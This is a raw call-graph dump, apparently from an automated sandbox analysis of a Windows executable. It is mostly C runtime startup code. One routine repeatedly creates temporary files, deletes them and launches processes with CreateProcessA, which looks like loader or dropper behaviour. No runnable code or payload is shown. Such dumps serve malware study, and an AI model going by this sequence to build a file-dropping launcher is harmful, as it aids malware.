9420->9416 9421 123585c 9421->9420 9423 1239195 9422->9423 9433 12391e8 9422->9433 9424 123919b WideCharToMultiByte 9423->9424 9427 12391b7 9424->9427 9424->9433 9425 12391f1 FreeEnvironmentStringsW 9426 123584b 9425->9426 9426->9416 9434 123588c 9426->9434 9428 1236508 __onexit 21 API calls 9427->9428 9429 12391bd 9428->9429 9430 12391da 9429->9430 9431 12391c4 WideCharToMultiByte 9429->9431 9432 12364ce ___vcrt_freefls@4 20 API calls 9430->9432 9431->9430 9432->9433 9433->9425 9433->9426 9435 12358a1 9434->9435 9436 12365f3 _abort 20 API calls 9435->9436 9446 12358c8 9436->9446 9437 123592c 9438 12364ce ___vcrt_freefls@4 20 API calls 9437->9438 9439 1235946 9438->9439 9439->9421 9440 12365f3 _abort 20 API calls 9440->9446 9441 123592e 9451 123595d 9441->9451 9442 1236556 26 API calls 9442->9446 9445 1235950 9448 1236ceb _abort 11 API calls 9445->9448 9446->9437 9446->9440 9446->9441 9446->9442 9446->9445 9449 12364ce ___vcrt_freefls@4 20 API calls 9446->9449 9447 12364ce ___vcrt_freefls@4 20 API calls 9447->9437 9450 123595c 9448->9450 9449->9446 9452 123596a 9451->9452 9456 1235934 9451->9456 9453 1235981 9452->9453 9454 12364ce ___vcrt_freefls@4 20 API calls 9452->9454 9455 12364ce ___vcrt_freefls@4 20 API calls 9453->9455 9454->9452 9455->9456 9456->9447 9544 123553a 9545 1235565 9544->9545 9546 1235549 9544->9546 9548 1238d8b 51 API calls 9545->9548 9546->9545 9547 123554f 9546->9547 9549 1236fad __dosmaperr 20 API calls 9547->9549 9550 123556c GetModuleFileNameA 9548->9550 9551 1235554 9549->9551 9552 1235590 9550->9552 9553 1236cdb _abort 26 API calls 9551->9553 9567 123565e 9552->9567 9554 123555e 9553->9554 9559 12355c3 9561 1236fad __dosmaperr 20 API calls 9559->9561 9560 12355cf 9562 123565e 38 API calls 9560->9562 9563 12355c8 9561->9563 9564 12355e5 9562->9564 9565 12364ce ___vcrt_freefls@4 20 API calls 9563->9565 9564->9563 9566 12364ce ___vcrt_freefls@4 20 API calls 9564->9566 9565->9554 9566->9563 9569 1235683 9567->9569 9568 1239116 38 API calls 9568->9569 9569->9568 9571 12356e3 9569->9571 9570 12355ad 9573 12357d3 9570->9573 9571->9570 9572 1239116 38 API calls 9571->9572 9572->9571 9574 12355ba 9573->9574 9575 12357e8 9573->9575 9574->9559 9574->9560 9575->9574 9576 12365f3 _abort 20 API calls 9575->9576 9577 1235816 9576->9577 9578 12364ce ___vcrt_freefls@4 20 API calls 9577->9578 9578->9574 9906 12364be 9907 12364c1 9906->9907 9908 12365b0 _abort 38 API calls 9907->9908 9909 12364cd 9908->9909 9579 1239201 9581 123920c 9579->9581 9580 1239513 11 API calls 9580->9581 9581->9580 9582 1239235 9581->9582 9583 1239231 9581->9583 9585 1239259 9582->9585 9586 1239266 9585->9586 9588 1239285 9585->9588 9587 1239270 RtlDeleteCriticalSection 9586->9587 9587->9587 9587->9588 9588->9583 9763 1236347 9766 1235a02 9763->9766 9775 123598c 9766->9775 9769 123598c 5 API calls 9770 1235a20 9769->9770 9771 123595d 20 API calls 9770->9771 9772 1235a2b 9771->9772 9773 123595d 20 API calls 9772->9773 9774 1235a36 9773->9774 9778 12359a5 9775->9778 9776 1232550 _ValidateLocalCookies 5 API calls 9777 12359c6 9776->9777 9777->9769 9778->9776 9589 1239706 9590 1239711 9589->9590 9592 1239737 9589->9592 9591 1239721 FreeLibrary 9590->9591 9590->9592 9591->9590 9457 1232604 9462 1232d83 SetUnhandledExceptionFilter 9457->9462 9459 1232609 9463 1235ee0 9459->9463 9461 1232614 9462->9459 9464 1235f06 9463->9464 9465 1235eec 9463->9465 9464->9461 9465->9464 9466 1236fad __dosmaperr 20 API calls 9465->9466 9467 1235ef6 9466->9467 9468 1236cdb _abort 26 API calls 9467->9468 9469 1235f01 9468->9469 9469->9461 9779 1235c44 9782 1236492 9779->9782 9783 123649e _abort 9782->9783 9784 12369c2 _abort 38 API calls 9783->9784 9786 12364a3 9784->9786 9785 12365b0 _abort 38 API calls 9787 12364cd 9785->9787 9786->9785 10302 1236acb 10310 12393b8 10302->10310 10305 1236a46 __dosmaperr 20 API calls 10306 1236ae7 10305->10306 10307 1236af4 10306->10307 10317 1236af7 10306->10317 10309 1236adf 10311 12392a1 _abort 5 API calls 10310->10311 10312 12393df 10311->10312 10313 12393f7 TlsAlloc 10312->10313 10314 12393e8 10312->10314 10313->10314 10315 1232550 _ValidateLocalCookies 5 API calls 10314->10315 10316 1236ad5 10315->10316 10316->10305 10316->10309 10318 1236b01 10317->10318 10319 1236b07 10317->10319 10321 123940e 10318->10321 10319->10309 10322 12392a1 _abort 5 API calls 10321->10322 10323 1239435 10322->10323 10324 123944d TlsFree 10323->10324 10325 1239441 10323->10325 10324->10325 10326 1232550 _ValidateLocalCookies 5 API calls 10325->10326 10327 123945e 10326->10327 10327->10319 9788 1232749 9791 1235327 9788->9791 9792 1236a46 __dosmaperr 20 API calls 9791->9792 9795 123533e 9792->9795 9793 1232550 _ValidateLocalCookies 5 API calls 9794 123275a 9793->9794 9795->9793 9910 1232d8f 9911 1232dc4 9910->9911 9913 1232d9f 9910->9913 9912 1236492 38 API calls 9914 1232dcf 9912->9914 9913->9911 9913->9912 9915 123638f 9916 12333a8 ___scrt_uninitialize_crt 8 API calls 9915->9916 9917 1236396 9916->9917 9918 123278c 9921 1232b24 9918->9921 9920 1232791 9920->9920 9922 1232b47 9921->9922 9923 1232b54 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9921->9923 9922->9923 9924 1232b4b 9922->9924 9923->9924 9924->9920 10328 12359cc 10329 12359e4 10328->10329 10330 12359de 10328->10330 10331 123595d 20 API calls 10330->10331 10331->10329 10332 1237fcc 10333 1237fd9 10332->10333 10334 12365f3 _abort 20 API calls 10333->10334 10335 1237ff3 10334->10335 10336 12364ce ___vcrt_freefls@4 20 API calls 10335->10336 10337 1237fff 10336->10337 10338 12365f3 _abort 20 API calls 10337->10338 10342 1238025 10337->10342 10340 1238019 10338->10340 10339 1239513 11 API calls 10339->10342 10341 12364ce ___vcrt_freefls@4 20 API calls 10340->10341 10341->10342 10342->10339 10343 1238031 10342->10343 9925 123a191 GetProcessHeap 9593 1233b10 RtlUnwind 9796 1233950 9797 1233962 9796->9797 9799 1233970 @_EH4_CallFilterFunc@8 9796->9799 9798 1232550 _ValidateLocalCookies 5 API calls 9797->9798 9798->9799 9800 123cb50 9801 123cb89 9800->9801 9802 123cb8d 9801->9802 9813 123cbb5 9801->9813 9803 1236fad __dosmaperr 20 API calls 9802->9803 9804 123cb92 9803->9804 9806 1236cdb _abort 26 API calls 9804->9806 9805 123ced9 9807 1232550 _ValidateLocalCookies 5 API calls 9805->9807 9808 123cb9d 9806->9808 9809 123cee6 9807->9809 9810 1232550 _ValidateLocalCookies 5 API calls 9808->9810 9811 123cba9 9810->9811 9813->9805 9814 123ca70 9813->9814 9817 123ca8b 9814->9817 9815 1232550 _ValidateLocalCookies 5 API calls 9816 123cb02 9815->9816 9816->9813 9817->9815 7965 1232616 7966 1232622 _abort 7965->7966 7996 1232932 7966->7996 7968 1232629 7970 1232652 7968->7970 8055 1232c32 IsProcessorFeaturePresent 7968->8055 7978 1232691 ___scrt_release_startup_lock 7970->7978 8007 1235aed 7970->8007 7974 1232671 _abort 7975 12326f1 8015 1233083 7975->8015 7978->7975 8059 1235d90 7978->8059 7997 123293b 7996->7997 8066 1232e9b IsProcessorFeaturePresent 7997->8066 8001 123294c 8006 1232950 8001->8006 8080 123640f 8001->8080 8004 1232967 8004->7968 8006->7968 8010 1235b04 8007->8010 8008 1232550 _ValidateLocalCookies 5 API calls 8009 123266b 8008->8009 8009->7974 8011 1235a91 8009->8011 8010->8008 8012 1235ac0 8011->8012 8013 1232550 _ValidateLocalCookies 5 API calls 8012->8013 8014 1235ae9 8013->8014 8014->7978 8378 1233049 GetModuleFileNameW 8015->8378 8017 123310d 8018 1232550 _ValidateLocalCookies 5 API calls 8017->8018 8019 12326f8 8018->8019 8022 1232d4d 8019->8022 8020 12330ab 8020->8017 8382 12311d7 8020->8382 8388 12333d0 8022->8388 8025 12326fe 8026 1235a3e 8025->8026 8390 1238d8b 8026->8390 8028 1235a47 8029 1232707 8028->8029 8394 1239116 8028->8394 8031 1232240 8029->8031 8032 1232269 ___scrt_get_show_window_mode 8031->8032 8033 123228e GetTempPathA 8032->8033 8836 1231eb0 8033->8836 8035 12322a5 8036 12322c0 GetTempFileNameA GetTempFileNameA 8035->8036 8037 1232356 Sleep 8035->8037 8039 12324ea GetLastError 8035->8039 8041 1232382 ___scrt_get_show_window_mode 8035->8041 8868 1231780 8035->8868 8036->8035 8037->8036 8910 12316a0 8039->8910 8042 12323b9 DeleteFileA 8041->8042 8044 12316a0 50 API calls 8042->8044 8046 1232413 CreateProcessA 8044->8046 8045 1232503 8050 1231a90 25 API calls 8045->8050 8914 1231a90 8045->8914 8047 1232446 GetLastError 8046->8047 8048 123247c 7 API calls 8046->8048 8049 12316a0 50 API calls 8047->8049 8924 1231c20 8048->8924 8052 123245f 8049->8052 8053 1232544 Sleep 8050->8053 8052->8045 8053->8036 8054 12324de Sleep 8054->8036 8056 1232c48 ___scrt_get_show_window_mode 8055->8056 8057 1232cf0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8056->8057 8058 1232d3a 8057->8058 8058->7968 8060 1236492 _abort 8059->8060 8061 1235db8 __onexit 8059->8061 8062 12369c2 _abort 38 API calls 8060->8062 8061->7975 8065 12364a3 8062->8065 8063 12365b0 _abort 38 API calls 8064 12364cd 8063->8064 8065->8063 8067 1232947 8066->8067 8068 123337a 8067->8068 8069 123337f ___vcrt_initialize_pure_virtual_call_handler 8068->8069 8092 1233a88 8069->8092 8072 123338d 8072->8001 8074 1233395 8075 12333a0 8074->8075 8076 1233399 8074->8076 8110 12331bb 8075->8110 8106 1233ac4 8076->8106 8165 123a1ac 8080->8165 8083 12333a8 8365 12331ce 8083->8365 8086 12333c7 8086->8006 8087 1233a6d ___vcrt_uninitialize_ptd 6 API calls 8088 12333bb 8087->8088 8089 1233ac4 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 8088->8089 8090 12333c0 8089->8090 8368 1233889 8090->8368 8093 1233a91 8092->8093 8095 1233aba 8093->8095 8096 1233389 8093->8096 8113 123381f 8093->8113 8097 1233ac4 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 8095->8097 8096->8072 8098 1233a3a 8096->8098 8097->8096 8131 123376e 8098->8131 8100 1233a44 8105 1233a4f 8100->8105 8136 12337e2 8100->8136 8102 1233a5d 8103 1233a6a 8102->8103 8141 1233a6d 8102->8141 8103->8074 8105->8074 8107 1233aee 8106->8107 8108 1233acf 8106->8108 8107->8072 8109 1233ad9 RtlDeleteCriticalSection 8108->8109 8109->8107 8109->8109 8150 1231000 8110->8150 8118 1233547 8113->8118 8115 1233839 8116 1233842 8115->8116 8117 1233856 InitializeCriticalSectionAndSpinCount 8115->8117 8116->8093 8117->8116 8121 1233577 8118->8121 8123 123357b __crt_fast_encode_pointer 8118->8123 8119 123359b 8122 12335a7 GetProcAddress 8119->8122 8119->8123 8121->8119 8121->8123 8124 12335e7 8121->8124 8122->8123 8123->8115 8125 123360f LoadLibraryExW 8124->8125 8129 1233604 8124->8129 8126 123362b GetLastError 8125->8126 8130 1233643 8125->8130 8127 1233636 LoadLibraryExW 8126->8127 8126->8130 8127->8130 8128 123365a FreeLibrary 8128->8129 8129->8121 8130->8128 8130->8129 8132 1233547 try_get_function 5 API calls 8131->8132 8133 1233788 8132->8133 8134 12337a0 TlsAlloc 8133->8134 8135 1233791 8133->8135 8135->8100 8137 1233547 try_get_function 5 API calls 8136->8137 8138 12337fc 8137->8138 8139 1233816 TlsSetValue 8138->8139 8140 123380b 8138->8140 8139->8140 8140->8102 8142 1233a77 8141->8142 8143 1233a7d 8141->8143 8145 12337a8 8142->8145 8143->8105 8146 1233547 try_get_function 5 API calls 8145->8146 8147 12337c2 8146->8147 8148 12337d9 TlsFree 8147->8148 8149 12337ce 8147->8149 8148->8149 8149->8143 8151 123100f 8150->8151 8156 1233668 8151->8156 8153 123102e 8154 1231037 8153->8154 8159 123105d 8153->8159 8154->8001 8157 1233547 try_get_function 5 API calls 8156->8157 8158 1233682 8157->8158 8158->8153 8162 12336a8 8159->8162 8161 1231077 8161->8154 8163 1233547 try_get_function 5 API calls 8162->8163 8164 12336c2 8163->8164 8164->8161 8166 123a1c9 8165->8166 8169 123a1c5 8165->8169 8166->8169 8171 1238289 8166->8171 8168 1232959 8168->8004 8168->8083 8183 1232550 8169->8183 8172 1238295 _abort 8171->8172 8190 1239242 RtlEnterCriticalSection 8172->8190 8174 123829c 8191 12397eb 8174->8191 8176 12382ab 8182 12382ba 8176->8182 8204 123811d GetStartupInfoW 8176->8204 8179 12382cb _abort 8179->8166 8215 12382d6 8182->8215 8184 123255b IsProcessorFeaturePresent 8183->8184 8185 1232559 8183->8185 8187 12327d2 8184->8187 8185->8168 8364 1232796 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8187->8364 8189 12328b5 8189->8168 8190->8174 8192 12397f7 _abort 8191->8192 8193 1239804 8192->8193 8194 123981b 8192->8194 8226 1236fad 8193->8226 8218 1239242 RtlEnterCriticalSection 8194->8218 8199 1239853 8232 123987a 8199->8232 8200 1239813 _abort 8200->8176 8203 1239827 8203->8199 8219 123973c 8203->8219 8205 123813a 8204->8205 8207 12381cc 8204->8207 8206 12397eb 27 API calls 8205->8206 8205->8207 8208 1238163 8206->8208 8210 12381d3 8207->8210 8208->8207 8209 1238191 GetFileType 8208->8209 8209->8208 8214 12381da 8210->8214 8211 123821d GetStdHandle 8211->8214 8212 1238285 8212->8182 8213 1238230 GetFileType 8213->8214 8214->8211 8214->8212 8214->8213 8363 123928a RtlLeaveCriticalSection 8215->8363 8217 12382dd 8217->8179 8218->8203 8235 12365f3 8219->8235 8221 123974e 8225 123975b 8221->8225 8242 1239513 8221->8242 8224 12397ad 8224->8203 8249 12364ce 8225->8249 8283 1236a46 GetLastError 8226->8283 8229 1236cdb 8341 1236c60 8229->8341 8231 1236ce7 8231->8200 8362 123928a RtlLeaveCriticalSection 8232->8362 8234 1239881 8234->8200 8240 1236600 _abort 8235->8240 8236 1236640 8239 1236fad __dosmaperr 19 API calls 8236->8239 8237 123662b RtlAllocateHeap 8238 123663e 8237->8238 8237->8240 8238->8221 8239->8238 8240->8236 8240->8237 8255 123a2c1 8240->8255 8270 12392a1 8242->8270 8244 123953a 8245 1239558 InitializeCriticalSectionAndSpinCount 8244->8245 8246 1239543 8244->8246 8245->8246 8247 1232550 _ValidateLocalCookies 5 API calls 8246->8247 8248 123956f 8247->8248 8248->8221 8250 12364d9 HeapFree 8249->8250 8254 1236502 __dosmaperr 8249->8254 8251 12364ee 8250->8251 8250->8254 8252 1236fad __dosmaperr 18 API calls 8251->8252 8253 12364f4 GetLastError 8252->8253 8253->8254 8254->8224 8260 123a305 8255->8260 8257 1232550 _ValidateLocalCookies 5 API calls 8258 123a301 8257->8258 8258->8240 8259 123a2d7 8259->8257 8261 123a311 _abort 8260->8261 8266 1239242 RtlEnterCriticalSection 8261->8266 8263 123a31c 8267 123a34e 8263->8267 8265 123a343 _abort 8265->8259 8266->8263 8268 123928a _abort RtlLeaveCriticalSection 8267->8268 8269 123a355 8268->8269 8269->8265 8273 12392cd 8270->8273 8275 12392d1 __crt_fast_encode_pointer 8270->8275 8271 12392f1 8274 12392fd GetProcAddress 8271->8274 8271->8275 8273->8271 8273->8275 8276 123933d 8273->8276 8274->8275 8275->8244 8277 1239353 8276->8277 8278 123935e LoadLibraryExW 8276->8278 8277->8273 8279 123937b GetLastError 8278->8279 8282 1239393 8278->8282 8280 1239386 LoadLibraryExW 8279->8280 8279->8282 8280->8282 8281 12393aa FreeLibrary 8281->8277 8282->8277 8282->8281 8284 1236a65 8283->8284 8285 1236a5f 8283->8285 8286 12365f3 _abort 17 API calls 8284->8286 8290 1236abc SetLastError 8284->8290 8302 1239464 8285->8302 8288 1236a77 8286->8288 8289 1236a7f 8288->8289 8309 12394ba 8288->8309 8293 12364ce ___vcrt_freefls@4 17 API calls 8289->8293 8291 1236ac5 8290->8291 8291->8229 8295 1236a85 8293->8295 8297 1236ab3 SetLastError 8295->8297 8296 1236a9b 8316 1236834 8296->8316 8297->8291 8300 12364ce ___vcrt_freefls@4 17 API calls 8301 1236aac 8300->8301 8301->8290 8301->8297 8303 12392a1 _abort 5 API calls 8302->8303 8304 123948b 8303->8304 8305 12394a3 TlsGetValue 8304->8305 8306 1239497 8304->8306 8305->8306 8307 1232550 _ValidateLocalCookies 5 API calls 8306->8307 8308 12394b4 8307->8308 8308->8284 8310 12392a1 _abort 5 API calls 8309->8310 8311 12394e1 8310->8311 8312 12394fc TlsSetValue 8311->8312 8313 12394f0 8311->8313 8312->8313 8314 1232550 _ValidateLocalCookies 5 API calls 8313->8314 8315 1236a94 8314->8315 8315->8289 8315->8296 8321 123680c 8316->8321 8327 123674c 8321->8327 8323 1236830 8324 12367bc 8323->8324 8333 1236650 8324->8333 8326 12367e0 8326->8300 8328 1236758 _abort 8327->8328 8329 1239242 _abort RtlEnterCriticalSection 8328->8329 8330 1236762 8329->8330 8331 1236788 _abort RtlLeaveCriticalSection 8330->8331 8332 1236780 _abort 8331->8332 8332->8323 8334 123665c _abort 8333->8334 8335 1239242 _abort RtlEnterCriticalSection 8334->8335 8336 1236666 8335->8336 8337 1236977 _abort 20 API calls 8336->8337 8338 123667e 8337->8338 8339 1236694 _abort RtlLeaveCriticalSection 8338->8339 8340 123668c _abort 8339->8340 8340->8326 8342 1236a46 __dosmaperr 20 API calls 8341->8342 8343 1236c76 8342->8343 8344 1236c84 8343->8344 8345 1236cd5 8343->8345 8350 1232550 _ValidateLocalCookies 5 API calls 8344->8350 8352 1236ceb IsProcessorFeaturePresent 8345->8352 8347 1236cda 8348 1236c60 _abort 26 API calls 8347->8348 8349 1236ce7 8348->8349 8349->8231 8351 1236cab 8350->8351 8351->8231 8353 1236cf6 8352->8353 8356 1236b11 8353->8356 8357 1236b2d _abort ___scrt_get_show_window_mode 8356->8357 8358 1236b59 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8357->8358 8361 1236c2a _abort 8358->8361 8359 1232550 _ValidateLocalCookies 5 API calls 8360 1236c48 GetCurrentProcess TerminateProcess 8359->8360 8360->8347 8361->8359 8362->8234 8363->8217 8364->8189 8372 1231088 8365->8372 8370 1233892 8368->8370 8371 12338b8 8368->8371 8369 12338a2 FreeLibrary 8369->8370 8370->8369 8370->8371 8371->8086 8375 12336eb 8372->8375 8374 123109a 8374->8086 8374->8087 8376 1233547 try_get_function 5 API calls 8375->8376 8377 1233705 8376->8377 8377->8374 8379 1233063 8378->8379 8380 123307a 8378->8380 8379->8380 8381 1233070 GetLastError 8379->8381 8380->8020 8381->8380 8385 1233725 8382->8385 8384 1231257 8384->8017 8386 1233547 try_get_function 5 API calls 8385->8386 8387 123373f 8386->8387 8387->8384 8389 1232d60 GetStartupInfoW 8388->8389 8389->8025 8391 1238d9d 8390->8391 8392 1238d94 8390->8392 8391->8028 8397 1238c8a 8392->8397 8833 12390bd 8394->8833 8417 12369c2 GetLastError 8397->8417 8399 1238c97 8437 1238da9 8399->8437 8401 1238c9f 8446 1238a1e 8401->8446 8404 1238cb6 8404->8391 8408 12364ce ___vcrt_freefls@4 20 API calls 8408->8404 8410 1238d11 8414 1238d3d 8410->8414 8415 12364ce ___vcrt_freefls@4 20 API calls 8410->8415 8411 1238cf4 8412 1236fad __dosmaperr 20 API calls 8411->8412 8413 1238cf9 8412->8413 8413->8408 8414->8413 8470 12388f4 8414->8470 8415->8414 8418 12369de 8417->8418 8419 12369d8 8417->8419 8421 12365f3 _abort 20 API calls 8418->8421 8424 1236a2d SetLastError 8418->8424 8420 1239464 _abort 11 API calls 8419->8420 8420->8418 8422 12369f0 8421->8422 8423 12369f8 8422->8423 8425 12394ba _abort 11 API calls 8422->8425 8426 12364ce ___vcrt_freefls@4 20 API calls 8423->8426 8424->8399 8427 1236a0d 8425->8427 8428 12369fe 8426->8428 8427->8423 8429 1236a14 8427->8429 8430 1236a39 SetLastError 8428->8430 8431 1236834 _abort 20 API calls 8429->8431 8473 12365b0 8430->8473 8433 1236a1f 8431->8433 8435 12364ce ___vcrt_freefls@4 20 API calls 8433->8435 8436 1236a26 8435->8436 8436->8424 8436->8430 8438 1238db5 _abort 8437->8438 8439 12369c2 _abort 38 API calls 8438->8439 8441 1238dbf 8439->8441 8443 12365b0 _abort 38 API calls 8441->8443 8444 1238e43 _abort 8441->8444 8445 12364ce ___vcrt_freefls@4 20 API calls 8441->8445 8608 1239242 RtlEnterCriticalSection 8441->8608 8609 1238e3a 8441->8609 8443->8441 8444->8401 8445->8441 8613 1234161 8446->8613 8449 1238a51 8451 1238a56 GetACP 8449->8451 8452 1238a68 8449->8452 8450 1238a3f GetOEMCP 8450->8452 8451->8452 8452->8404 8453 1236508 8452->8453 8454 1236546 8453->8454 8458 1236516 _abort 8453->8458 8455 1236fad __dosmaperr 20 API calls 8454->8455 8457 1236544 8455->8457 8456 1236531 RtlAllocateHeap 8456->8457 8456->8458 8457->8413 8460 1238e4b 8457->8460 8458->8454 8458->8456 8459 123a2c1 _abort 7 API calls 8458->8459 8459->8458 8461 1238a1e 40 API calls 8460->8461 8462 1238e6a 8461->8462 8465 1238ebb IsValidCodePage 8462->8465 8467 1238e71 8462->8467 8469 1238ee0 ___scrt_get_show_window_mode 8462->8469 8463 1232550 _ValidateLocalCookies 5 API calls 8464 1238cec 8463->8464 8464->8410 8464->8411 8466 1238ecd GetCPInfo 8465->8466 8465->8467 8466->8467 8466->8469 8467->8463 8724 1238af6 GetCPInfo 8469->8724 8797 12388b1 8470->8797 8472 1238918 8472->8413 8484 123a443 8473->8484 8477 12365e8 8514 1235d7a 8477->8514 8478 12365ca IsProcessorFeaturePresent 8480 12365d5 8478->8480 8479 12365c0 8479->8477 8479->8478 8482 1236b11 _abort 8 API calls 8480->8482 8482->8477 8517 123a3b1 8484->8517 8487 123a49e 8488 123a4aa _abort 8487->8488 8489 1236a46 __dosmaperr 20 API calls 8488->8489 8492 123a4d7 _abort 8488->8492 8495 123a4d1 _abort 8488->8495 8489->8495 8490 123a523 8491 1236fad __dosmaperr 20 API calls 8490->8491 8493 123a528 8491->8493 8499 123a54f 8492->8499 8531 1239242 RtlEnterCriticalSection 8492->8531 8496 1236cdb _abort 26 API calls 8493->8496 8495->8490 8495->8492 8513 123a506 8495->8513 8496->8513 8500 123a5ae 8499->8500 8502 123a5a6 8499->8502 8510 123a5d9 8499->8510 8532 123928a RtlLeaveCriticalSection 8499->8532 8500->8510 8533 123a495 8500->8533 8505 1235d7a _abort 28 API calls 8502->8505 8505->8500 8507 12369c2 _abort 38 API calls 8511 123a63c 8507->8511 8509 123a495 _abort 38 API calls 8509->8510 8536 123a65e 8510->8536 8512 12369c2 _abort 38 API calls 8511->8512 8511->8513 8512->8513 8540 12402a9 8513->8540 8544 1235b45 8514->8544 8520 123a357 8517->8520 8519 12365b5 8519->8479 8519->8487 8521 123a363 _abort 8520->8521 8526 1239242 RtlEnterCriticalSection 8521->8526 8523 123a371 8527 123a3a5 8523->8527 8525 123a398 _abort 8525->8519 8526->8523 8530 123928a RtlLeaveCriticalSection 8527->8530 8529 123a3af 8529->8525 8530->8529 8531->8499 8532->8502 8534 12369c2 _abort 38 API calls 8533->8534 8535 123a49a 8534->8535 8535->8509 8537 123a664 8536->8537 8538 123a62d 8536->8538 8543 123928a RtlLeaveCriticalSection 8537->8543 8538->8507 8538->8511 8538->8513 8541 1232550 _ValidateLocalCookies 5 API calls 8540->8541 8542 12402b4 8541->8542 8542->8542 8543->8538 8545 1235b51 _abort 8544->8545 8546 1235b69 8545->8546 8566 1235c9f GetModuleHandleW 8545->8566 8575 1239242 RtlEnterCriticalSection 8546->8575 8550 1235c0f 8579 1235c4f 8550->8579 8553 1235be6 8555 1235bfe 8553->8555 8561 1235a91 _abort 5 API calls 8553->8561 8562 1235a91 _abort 5 API calls 8555->8562 8556 1235c58 8560 12402a9 _abort 5 API calls 8556->8560 8557 1235c2c 8582 1235c5e 8557->8582 8565 1235c5d 8560->8565 8561->8555 8562->8550 8563 1235b71 8563->8550 8563->8553 8576 123629d 8563->8576 8567 1235b5d 8566->8567 8567->8546 8568 1235ce3 GetModuleHandleExW 8567->8568 8569 1235d0d GetProcAddress 8568->8569 8570 1235d22 8568->8570 8569->8570 8571 1235d36 FreeLibrary 8570->8571 8572 1235d3f 8570->8572 8571->8572 8573 1232550 _ValidateLocalCookies 5 API calls 8572->8573 8574 1235d49 8573->8574 8574->8546 8575->8563 8590 1235fb7 8576->8590 8601 123928a RtlLeaveCriticalSection 8579->8601 8581 1235c28 8581->8556 8581->8557 8602 123967f 8582->8602 8585 1235c8c 8587 1235ce3 _abort 8 API calls 8585->8587 8586 1235c6c GetPEB 8586->8585 8588 1235c7c GetCurrentProcess TerminateProcess 8586->8588 8589 1235c94 ExitProcess 8587->8589 8588->8585 8593 1235f66 8590->8593 8592 1235fdb 8592->8553 8594 1235f72 _abort 8593->8594 8595 1239242 _abort RtlEnterCriticalSection 8594->8595 8596 1235f80 8595->8596 8597 1236026 _abort 20 API calls 8596->8597 8598 1235f8d 8597->8598 8599 1235fab _abort RtlLeaveCriticalSection 8598->8599 8600 1235f9e _abort 8599->8600 8600->8592 8601->8581 8603 12396a4 8602->8603 8604 123969a 8602->8604 8605 12392a1 _abort 5 API calls 8603->8605 8606 1232550 _ValidateLocalCookies 5 API calls 8604->8606 8605->8604 8607 1235c68 8606->8607 8607->8585 8607->8586 8608->8441 8612 123928a RtlLeaveCriticalSection 8609->8612 8611 1238e41 8611->8441 8612->8611 8614 123417e 8613->8614 8615 1234174 8613->8615 8614->8615 8616 12369c2 _abort 38 API calls 8614->8616 8615->8449 8615->8450 8617 123419f 8616->8617 8621 1237537 8617->8621 8622 12341b8 8621->8622 8623 123754a 8621->8623 8625 1237564 8622->8625 8623->8622 8629 123a052 8623->8629 8626 1237577 8625->8626 8628 123758c 8625->8628 8627 1238da9 __cftof 38 API calls 8626->8627 8626->8628 8627->8628 8628->8615 8630 123a05e _abort 8629->8630 8631 12369c2 _abort 38 API calls 8630->8631 8632 123a067 8631->8632 8633 123a0b5 _abort 8632->8633 8641 1239242 RtlEnterCriticalSection 8632->8641 8633->8622 8635 123a085 8642 123a0c9 8635->8642 8640 12365b0 _abort 38 API calls 8640->8633 8641->8635 8643 123a099 8642->8643 8644 123a0d7 __cftof 8642->8644 8646 123a0b8 8643->8646 8644->8643 8649 1239e05 8644->8649 8723 123928a RtlLeaveCriticalSection 8646->8723 8648 123a0ac 8648->8633 8648->8640 8650 1239e85 8649->8650 8652 1239e1b 8649->8652 8653 12364ce ___vcrt_freefls@4 20 API calls 8650->8653 8676 1239ed3 8650->8676 8652->8650 8654 1239e4e 8652->8654 8658 12364ce ___vcrt_freefls@4 20 API calls 8652->8658 8655 1239ea7 8653->8655 8664 12364ce ___vcrt_freefls@4 20 API calls 8654->8664 8675 1239e70 8654->8675 8656 12364ce ___vcrt_freefls@4 20 API calls 8655->8656 8659 1239eba 8656->8659 8657 12364ce ___vcrt_freefls@4 20 API calls 8661 1239e7a 8657->8661 8663 1239e43 8658->8663 8665 12364ce ___vcrt_freefls@4 20 API calls 8659->8665 8660 1239ee1 8662 1239f41 8660->8662 8674 12364ce 20 API calls ___vcrt_freefls@4 8660->8674 8666 12364ce ___vcrt_freefls@4 20 API calls 8661->8666 8667 12364ce ___vcrt_freefls@4 20 API calls 8662->8667 8677 12399c4 8663->8677 8669 1239e65 8664->8669 8670 1239ec8 8665->8670 8666->8650 8671 1239f47 8667->8671 8705 1239ac2 8669->8705 8673 12364ce ___vcrt_freefls@4 20 API calls 8670->8673 8671->8643 8673->8676 8674->8660 8675->8657 8717 1239f78 8676->8717 8678 12399d5 8677->8678 8679 1239abe 8677->8679 8680 12399e6 8678->8680 8682 12364ce ___vcrt_freefls@4 20 API calls 8678->8682 8679->8654 8681 12399f8 8680->8681 8683 12364ce ___vcrt_freefls@4 20 API calls 8680->8683 8684 1239a0a 8681->8684 8685 12364ce ___vcrt_freefls@4 20 API calls 8681->8685 8682->8680 8683->8681 8686 1239a1c 8684->8686 8687 12364ce ___vcrt_freefls@4 20 API calls 8684->8687 8685->8684 8688 1239a2e 8686->8688 8690 12364ce ___vcrt_freefls@4 20 API calls 8686->8690 8687->8686 8689 1239a40 8688->8689 8691 12364ce ___vcrt_freefls@4 20 API calls 8688->8691 8692 1239a52 8689->8692 8693 12364ce ___vcrt_freefls@4 20 API calls 8689->8693 8690->8688 8691->8689 8694 1239a64 8692->8694 8695 12364ce ___vcrt_freefls@4 20 API calls 8692->8695 8693->8692 8696 1239a76 8694->8696 8698 12364ce ___vcrt_freefls@4 20 API calls 8694->8698 8695->8694 8697 1239a88 8696->8697 8699 12364ce ___vcrt_freefls@4 20 API calls 8696->8699 8700 1239a9a 8697->8700 8701 12364ce ___vcrt_freefls@4 20 API calls 8697->8701 8698->8696 8699->8697 8702 1239aac 8700->8702 8703 12364ce ___vcrt_freefls@4 20 API calls 8700->8703 8701->8700 8702->8679 8704 12364ce ___vcrt_freefls@4 20 API calls 8702->8704 8703->8702 8704->8679 8706 1239b27 8705->8706 8707 1239acf 8705->8707 8706->8675 8708 1239adf 8707->8708 8710 12364ce ___vcrt_freefls@4 20 API calls 8707->8710 8709 1239af1 8708->8709 8711 12364ce 